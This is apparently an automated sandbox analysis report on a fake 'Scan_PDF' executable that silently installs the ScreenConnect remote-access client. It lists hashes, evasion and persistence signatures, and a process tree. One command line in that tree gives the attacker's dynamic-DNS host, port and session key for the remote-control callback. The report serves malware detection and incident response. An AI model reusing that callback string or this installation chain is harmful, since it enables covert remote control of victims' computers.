Edit tour
Windows
Analysis Report
Scan_PDF_2017163298.exe
Overview
General Information
| Sample name: | Scan_PDF_2017163298.exe |
| Analysis ID: | 1523870 |
| MD5: | 1204478277c15197fbdae6cc49c8f786 |
| SHA1: | da4038fb3569094afacf6edabab8f61323a5cccc |
| SHA256: | fd0198e078b123e91bf968c6457666b8d9f9b5e69eae273665994d1a4595b6aa |
| Tags: | exefiledn-comuser-JAMESWT_MHT |
| Infos: |   |
 | |
Detection
ScreenConnect Tool
| Score: | 42 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Compliance
| Score: | 32 |
| Range: | 0 - 100 |
Signatures
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Initial sample is a PE file and has a suspicious name
Modifies security policies related information
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Uses dynamic DNS services
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool
Classification
- System is w10x64
Scan_PDF_2017163298.exe (PID: 7352 cmdline: "C:\Users\ user\Deskt op\Scan_PD F_20171632 98.exe" MD5: 1204478277C15197FBDAE6CC49C8F786) 
msiexec.exe (PID: 7452 cmdline: "C:\Window s\System32 \msiexec.e xe" /i "C: \Users\use r\AppData\ Local\Temp \ScreenCon nect\e6cb7 7284cf765a a\setup.ms i" MD5: 9D09DC1EDA745A5F87553048E57620CF)
- msiexec.exe (PID: 7484 cmdline:
C:\Windows \system32\ msiexec.ex e /V MD5: E5DA170027542E25EDE42FC54C929077) - msiexec.exe (PID: 7568 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng F709E0C 1738E8A53D FEDA487898 72001 C MD5: 9D09DC1EDA745A5F87553048E57620CF) 
rundll32.exe (PID: 7616 cmdline: rundll32.e xe "C:\Use rs\user\Ap pData\Loca l\Temp\MSI 9390.tmp", zzzzInvoke ManagedCus tomActionO utOfProc S fxCA_52807 96 1 Scree nConnect.I nstallerAc tions!Scre enConnect. ClientInst allerActio ns.FixupSe rviceArgum ents MD5: 889B99C52A60DD49227C5E485A016679) - msiexec.exe (PID: 7672 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng 44B4340 3CFD66C9CC 500A14417C F0426 MD5: 9D09DC1EDA745A5F87553048E57620CF) - msiexec.exe (PID: 7720 cmdline:
C:\Windows \syswow64\ MsiExec.ex e -Embeddi ng E44ABF9 CE7CBB19DD F57A0D6AD3 151E3 E Gl obal\MSI00 00 MD5: 9D09DC1EDA745A5F87553048E57620CF)
- ScreenConnect.ClientService.exe (PID: 7760 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Cl ientServic e.exe" "?e =Access&y= Guest&h=kk l22.ddns.n et&p=8041& s=478e82c1 -db06-42e2 -b73b-60fd 80c17bc4&k =BgIAAACkA ABSU0ExAAg AAAEAAQCpD LJbB2UCJQS T7J%2beAL4 SRxBN9FnGD mzuSSe%2fj H%2bnKBeOQ FHQ%2bCr3L ypD1KSb17o RWP4zVHy7B T585yzIdtE sLOQJGVUwz eIFWaAKwKf BsHG%2fh8G YVt85W1oIV uD0heJmJtq EdcOjXvXPD 4oJuQHoqhB bYLoSnsbfr TP0R040%2b cfkCNslvuf 01cnsbcAey UEFRKIz%2b 8o0YJwrixE 6vdRb5cxn% 2bauV36m92 %2b6%2fhNC 5sRzM45Hr1 FU47wA4rAR a8OnACYafp 32jE3t2Cm7 EEkMt%2bS6 HWKgaZMp0V LkBgPw3WnP 85fhslYN9U z3EZtsBn%2 f97CFE2jSA v4%2brdgIm A3na8&t=sc an_pdf&c=w indows%20p df%20viewe r&c=scan_p df&c=scan_ pdf&c=scan _pdf&c=&c= &c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447) - ScreenConnect.WindowsClient.exe (PID: 7832 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "60 0c2429-361 9-41f2-bc1 a-bc0ec60c 72d7" "Use r" MD5: 20AB8141D958A58AADE5E78671A719BF) - ScreenConnect.WindowsClient.exe (PID: 7964 cmdline:
"C:\Progra m Files (x 86)\Screen Connect Cl ient (e6cb 77284cf765 aa)\Screen Connect.Wi ndowsClien t.exe" "Ru nRole" "be 73d786-925 b-47a5-99d f-a44cdbf0 e1aa" "Sys tem" MD5: 20AB8141D958A58AADE5E78671A719BF)
- svchost.exe (PID: 3784 cmdline:
C:\Windows \System32\ svchost.ex e -k Local Service -p -s Licens eManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 5 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security | ||
| Click to see the 4 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||